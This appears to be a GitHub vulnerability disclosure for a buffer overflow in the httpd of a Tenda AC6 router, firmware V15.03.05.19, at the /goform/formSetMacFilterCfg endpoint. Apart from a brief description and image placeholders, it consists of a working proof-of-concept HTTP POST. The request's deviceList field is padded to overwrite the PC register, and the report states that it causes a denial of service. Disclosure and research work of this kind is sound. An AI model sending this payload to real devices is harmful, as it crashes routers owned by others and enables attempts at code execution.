Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Tenda AC6V1.0 V15.03.05.19 formSetMacFilterCfg buffer overflow vulnerability

Description

Tenda Router AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow in the httpd module when handling /goform/formSetMacFilterCfg request.

Firmware information

Affected version

Vulnerability details

This vulnerability lies in the /goform/formSetMacFilterCfg page,The details are shown below:

image-20221118102311680

image-20221118110536129

image-20221118105153664

image-20221118104935990

Using A*144 to padding, we can control PC register

image-20221118110047143

POC

This POC can result in a Dos.

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 182
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=eeg1qw
Connection: close

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11

image-20221118103155735